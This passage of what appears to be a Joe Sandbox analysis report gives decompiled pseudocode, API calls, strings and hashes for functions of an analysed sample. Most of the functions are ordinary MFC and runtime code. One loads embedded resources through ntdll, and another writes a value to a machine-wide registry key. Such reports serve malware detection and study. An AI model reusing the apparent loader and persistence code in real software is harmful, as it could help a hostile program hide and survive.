						if(_t76 != 0) {
							_t54 =  *((intOrPtr*)(_t76 + 4));
							if(_t54 != 0) {
								_t82 =  *((intOrPtr*)(_t54 + 0x90));
								if( *((intOrPtr*)(_t54 + 0x90)) == 0) {
									E0041A173(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E00411888(_t76);
									_push(_t76);
									E00402F0C(_t59, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 004120CC
GetModuleHandleA.KERNEL32(?,004393E0,00000000), ref: 00412197
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 004121A7

Strings

mfcm80.dll, xrefs: 00412186
MFCM80ReleaseManagedReferences, xrefs: 004121A1

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: b8a823503778c49e59a79fea30dc8b9f381be7c146b62c3227563022fb454cd2
Instruction ID: 22469c7bcacca5b825b37335fd20bb5c9480a0c645dc819855c5a6f900c70753
Opcode Fuzzy Hash: b8a823503778c49e59a79fea30dc8b9f381be7c146b62c3227563022fb454cd2
Instruction Fuzzy Hash: 5A319E31A00205ABCF15EFA1C9457EE77B5AF49304F1440AEE904EB292DBBCDD85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD1D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040FD1D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E0040DBC7(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E0040DB94(_t51, _t65, 0, _t77) + 4));
					_t70 = E0040F089(0x44642c);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E00421C45(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E0041E18A(_t51, _t66, _t70, _t83);
								}
								_t37 = E0041ECA7(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E0041ECA7(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E00421C45(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E00404C1E();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E0040FC51( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E0040FC51( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E0040FC51( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E0040FC51( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E0040FC51( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

APIs

__msize.LIBCMT ref: 0040FDAE
__msize.LIBCMT ref: 0040FDD1
_malloc.LIBCMT ref: 0040FDE9
_malloc.LIBCMT ref: 0040FDFE

Strings

,dD, xrefs: 0040FD92

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: __msize_malloc
String ID: ,dD
API String ID: 1288803200-3191229884
Opcode ID: 58876fb9e627804367ae5f76963656d2a1121e4b44d7c996d452b15496b7a07f
Instruction ID: 2f4e633648d44568a440bb3fa2de23a969c37f1f238f370252bd419c8cc87b54
Opcode Fuzzy Hash: 58876fb9e627804367ae5f76963656d2a1121e4b44d7c996d452b15496b7a07f
Instruction Fuzzy Hash: 5E2173315002109FDB34AF72D885A6B77A4BF44714B14853FEC19AAAD6DB38EC85CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0042CC9A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042CC9A() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x4483c0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x4483c0 = _t5;
				}
				_t6 = E004265A8(_t5, 4);
				 *0x4473b8 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x4442e0;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x444560) {
							break;
						}
						_t6 =  *0x4473b8; // 0x2241ea8
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x4442f0;
					do {
						_t10 =  *((intOrPtr*)((_t20 & 0x0000001f) * 0x28 +  *((intOrPtr*)(0x4483e0 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x444350);
					return 0;
				} else {
					 *0x4483c0 = _t26;
					_t6 = E004265A8(_t26, 4);
					 *0x4473b8 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

APIs

__calloc_crt.LIBCMT ref: 0042CCBC
__calloc_crt.LIBCMT ref: 0042CCD5

Strings

BD, xrefs: 0042CCEC
`ED, xrefs: 0042CD01
PCD, xrefs: 0042CD3E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: __calloc_crt
String ID: PCD$`ED$BD
API String ID: 3494438863-3786296796
Opcode ID: ee61e886c595784a642732bd44bf13424e53494a76758dd75d135ed60843f2d1
Instruction ID: 5d6bc2e65ec50afa7cfd9c24b92ad8cceccf8fb15337d2a1a44d9866e0da7712
Opcode Fuzzy Hash: ee61e886c595784a642732bd44bf13424e53494a76758dd75d135ed60843f2d1
Instruction Fuzzy Hash: 6F11E7323482205BF7149F6EBCD076E2791FB96B24BA4413FF905C7294DB3C8882468C

Uniqueness

Uniqueness Score: -1.00%

Function 00407923, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407923(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E00407777() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E004215F5(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x446290(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00407961
GetSystemMetrics.USER32 ref: 00407979
GetSystemMetrics.USER32 ref: 00407980

Strings

B, xrefs: 00407940
DISPLAY, xrefs: 0040799D

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 2926c6d18e6f0b630ebea8befa15ebd50504e40b77fdf81e56c32f1ff9cf5217
Instruction ID: f4921b07837d5c35b9459696712d0f96a64d958530ee0b5bfefb63986bd7101a
Opcode Fuzzy Hash: 2926c6d18e6f0b630ebea8befa15ebd50504e40b77fdf81e56c32f1ff9cf5217
Instruction Fuzzy Hash: BA11CAB1A04324ABDF119F649D81A9B7B68EF09750F004077FD05BE196D2B5F900CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 00405D8B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D8B(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E0040810E(__ecx, __eflags, _t26) == 0) {
					_t10 = E0040A584(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E00408550(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E0040F7F5(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

Strings

Edit, xrefs: 00405DDB

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: cadf5cdf105f9b2e6c32f1f83ab6765bdb8c0ead7ddf9359437142abd91223ca
Instruction ID: 357ecc9c0fe06753b2f7ef8780776397737a938da9b130e61a6109f3b055d991
Opcode Fuzzy Hash: cadf5cdf105f9b2e6c32f1f83ab6765bdb8c0ead7ddf9359437142abd91223ca
Instruction Fuzzy Hash: B4018430210A01A7EA203B26DC09B9BB7A5EF94754F14483BB581F22E2DB7CDD61CD9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401A70, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401A70(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				char _v28;
				_Unknown_base(*)()* _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;

				_v44 = 0;
				_v28 = 0;
				_v16 = _a8;
				_v12 = _a4;
				_v8 = _a12;
				_v20 = E00401A10(L"ntdll.dll");
				_v24 = GetProcAddress(_v20, "LdrFindResource_U");
				_v32 = GetProcAddress(_v20, "LdrAccessResource");
				_v40 = _v24(0x400000,  &_v16, 3,  &_v36);
				if(_v40 >= 0) {
					_v40 = _v32(0x400000, _v36,  &_v44,  &_v28);
					if(_v40 >= 0 && _a16 != 0) {
						 *_a16 = _v28;
					}
				}
				return _v44;
			}

0x00401a76
0x00401a7d
0x00401a87
0x00401a8d
0x00401a93
0x00401aa3
0x00401ab5
0x00401ac7
0x00401adc
0x00401ae3
0x00401af9
0x00401b00
0x00401b0e
0x00401b0e
0x00401b00
0x00401b16

APIs

GetProcAddress.KERNEL32(?,LdrFindResource_U), ref: 00401AAF
GetProcAddress.KERNEL32(?,LdrAccessResource), ref: 00401AC1

Strings

LdrAccessResource, xrefs: 00401AB8
LdrFindResource_U, xrefs: 00401AA6
ntdll.dll, xrefs: 00401A96

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AddressProc
String ID: LdrAccessResource$LdrFindResource_U$ntdll.dll
API String ID: 190572456-309990276
Opcode ID: fd4fbc9ac952d96f1e106f0f94c6f3281e9f40c0831bf339fd2d1916f06a4695
Instruction ID: 8a5841fff638097e8a695f73e2a584e1330be098e6ee4213b5b30c9d0d5cad24
Opcode Fuzzy Hash: fd4fbc9ac952d96f1e106f0f94c6f3281e9f40c0831bf339fd2d1916f06a4695
Instruction Fuzzy Hash: F521E7B4D002099FDB04DF94D945BEEBBB4FF88304F10446AE915B7290E778AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402560, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402560(intOrPtr __ecx, CHAR* _a4) {
				void* _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				int _t18;
				char* _t27;
				char* _t28;

				_v20 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_t27 =  *0x442000; // 0x4346d4
				_v16 = RegCreateKeyExA(0x80000002, _t27, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
				if(_v16 == 0) {
					_t18 = lstrlenA(_a4);
					_t28 =  *0x442010; // 0x43465c
					_v16 = RegSetValueExA(_v8, _t28, 0, 1, _a4, _t18 + 1);
					RegCloseKey(_v8);
				}
				return _v16;
			}

0x00402566
0x00402569
0x00402570
0x0040258c
0x0040259e
0x004025a5
0x004025ab
0x004025bd
0x004025ce
0x004025d5
0x004025d5
0x004025e1

APIs

RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402598
lstrlenA.KERNEL32(?), ref: 004025AB
RegSetValueExA.ADVAPI32(00000000,0043465C,00000000,00000001,?,-00000001), ref: 004025C8
RegCloseKey.ADVAPI32(00000000), ref: 004025D5

Strings

\FC, xrefs: 004025BD

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: \FC
API String ID: 1356686001-3541169775
Opcode ID: c7a0b32510f0cb6109f82215027c5292be295ddd1e68631b43d5b4ef6fa880fd
Instruction ID: 459d6452fb9c9d5ccab35ccbd8606333e30272a4718eec85ccb3f9d8e5713986
Opcode Fuzzy Hash: c7a0b32510f0cb6109f82215027c5292be295ddd1e68631b43d5b4ef6fa880fd
Instruction Fuzzy Hash: 8701EDB9A00208BBDB14DF94DD49FAEB7B9EB48700F108159F615A7280D6B56A00DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041295B, Relevance: 7.6, APIs: 5, Instructions: 108
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041295B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E0041F6EA(E00432C4E, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x412b1b) & 0x000000ff) * 4 +  &M00412AF3))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E00413008( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E0040EA5E();
							__ecx = __ebp + 0xc;
							__eax = E0040320E(__ebp + 0xc, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E00403478(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E0040E75E(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E0040E7B2(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E00411C9F( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E00412822(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E0040EA5E();
							__ecx = __ebp + 0xc;
							__eax = E0040320E(__ebp + 0xc, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E0040A240(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E00403036( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E0041F7C2(_t56);
			}

APIs

__EH_prolog3.LIBCMT ref: 00412962
SendMessageA.USER32(?,00000138,?,?), ref: 004129DA
GetBkColor.GDI32(?), ref: 004129E3
GetTextColor.GDI32(?), ref: 004129EF
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 00412A81

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: e95946eb13d09b0138d39ad7df32a0f0b4675811a65c7620a99874e0fb4b9fbf
Instruction ID: 105b4171879299afdcc85ecd79fbceca975293f7ace257aaf3855ae8da3ba32c
Opcode Fuzzy Hash: e95946eb13d09b0138d39ad7df32a0f0b4675811a65c7620a99874e0fb4b9fbf
Instruction Fuzzy Hash: 8E419D71500305DFCB20DF65C944ADE77B0FF04314F10896EE896AB3A1D7B8A9A1CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405482, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00405482(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				intOrPtr _t43;
				void* _t44;
				char** _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x443590; // 0x8ffedb05
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E0041F71D(E00431D33, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E00403667(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E00405482(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E00403036( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E0041E5DF(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 004054A1
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 004054C0
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 004054DE
RegDeleteKeyA.ADVAPI32(?,?), ref: 00405559
RegCloseKey.ADVAPI32(?), ref: 00405564

Part of subcall function 00403667: __EH_prolog3.LIBCMT ref: 0040366E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: ef6aa7cf2f3b8b7d913693d12d450bc24d80ee2784bfb5f8f524b31fd861a622
Instruction ID: b1f98a2856fb891a4ad2f1730a2dfbfc327df959dd0772622e21178d5af673db
Opcode Fuzzy Hash: ef6aa7cf2f3b8b7d913693d12d450bc24d80ee2784bfb5f8f524b31fd861a622
Instruction Fuzzy Hash: 7921CC76900219ABDB25DFA4CC41AEEB7B4FB08314F10013AED95B73D0DB385E448BA4

Uniqueness

Uniqueness Score: -1.00%

